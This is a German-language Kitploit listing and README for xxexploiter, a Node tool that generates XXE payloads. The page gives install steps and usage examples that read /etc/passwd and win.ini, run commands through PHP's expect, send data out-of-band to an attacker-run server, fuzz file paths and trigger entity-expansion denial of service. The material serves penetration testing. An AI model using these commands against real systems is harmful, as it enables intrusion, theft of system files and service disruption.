Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/luisfontes19/xxexploiter
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationFuzzing
GitHubluisfontes19/xxexploiter

xxexploiter

Tool zur Hilfe bei der Ausnutzung von XXE-Sicherheitslücken

Repository anzeigen
615706vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Webseite
Teilen

XXExploiter

Build codecov Known Vulnerabilities License: MIT

XXExploiter

Es generiert die XML-Payloads und startet automatisch einen Server, um die benötigten DTDs bereitzustellen oder Datenexfiltration durchzuführen.

Installation

root@kitploit:~
#install node and npm if you don't have it yet 
npm install -g xxexploiter

Erstellen und Ausführen aus dem Quellcode

Tool herunterladen

Dies ist eine einfache Node-Anwendung, die mit TypeScript geschrieben wurde. Sie können sie also wie andere Apps erstellen:
(installieren Sie zuerst node und npm, falls Sie diese nicht haben)

root@kitploit:~
npm install  
npm run build  
#you may need to npm install typescript -g in order for 'npm build' to succeed 

Um die App auszuführen, haben Sie drei Möglichkeiten:

root@kitploit:~
npm start [args]  
node dist/index.js [args]  
npm link #and now just call xxexploiter

Oder Sie können es auf Ihrem System installieren:

root@kitploit:~
npm link

Verwendung

root@kitploit:~
Usage: xxexploiter [command] [options]

Commands:
  xxexploiter file [file_to_read]  Use XXE to do a request
  xxexploiter request [URL]        Use XXE to do a request
  xxexploiter expect [command]     Use XXE to execute a command through PHP's expect
  xxexploiter xee [expantions]     Generate a huge content by resolving entities

Fuzzing Specific Options
  -w, --wordlist        Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
                        for the magic.
  -y, --success-string  String to search for a success response in the requests. Not usefull for blind attacks
  -n, --error-string    String to search for an error response in the request. Not usefull for blind attacks

Options:
  --version             Show version number                                                                    [boolean]
  -s, --server          Server address for OOB and DTD
  -p, --port            Server port for OOB and DTDs. Default: 7777
  -t, --template        path to an XML template where to inject payload
  -m, --mode            Extraction Mode: xml, oob, cdata. Default: xml
  -e, --encode          Extraction Encoding: none, phpbase64. Default: none
  -o, --output          Output for the XML payload file. Default is to console
  -x                    Use a request to automatically send the xml file
  -X, --request-output  Output the response from -x option. If not defined goes to stdout
  --verbose             Enable some messages help for understanding whats happening
  --doctype             Specify the name of the doctype to be injected. Default is xxexploiter
  -h, --help            Show help                                                                              [boolean]

Examples:
  xxexploiter expect ls
  xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml
  xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob
  xxexploiter xee 900000000 -o output.xml
  xxexploiter file /etc/passwd -x request.txt -t template.xml
  xxexploiter file /root/{FUZZ} -w wordlist.txt -n "not found" -x request.txt

Extra Info:
  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to
  be injected
  - When specifiying file paths for windows use forward slash.
  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
  Usefull with blind attacks
  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
  cdata
  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
  - When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
  or an expected success string

Beispiele

Einfache Payload-Generierung

asciicast

Automatisierte Anfrage zum Senden des Payloads

asciicast

OOB-Extraktion mit automatisierter Anfrage

asciicast

Fuzzing

asciicast

Einige Hinweise:

Wenn Sie den OOB- oder CDATA-Modus wählen, generiert XXExploiter die erforderlichen DTDs, die eingebunden werden sollen, und startet einen Server, um sie zu hosten. Bedenken Sie, dass Sie bei Verwendung dieser Optionen die Serveradresse angeben sollten.

Wenn Sie Inhalte im XML-Rumpf einfügen, bedenken Sie, dass XML-eingeschränkte Zeichen wie '<' das Parsing stören können. Verwenden Sie daher CDATA oder PHPs base64encode.

Die meisten Sprachen begrenzen die Anzahl der Entity-Expansionen oder die Gesamtlänge des expandierten Inhalts. Testen Sie daher XEE zuerst auf Ihrem Rechner unter denselben Bedingungen wie beim Ziel.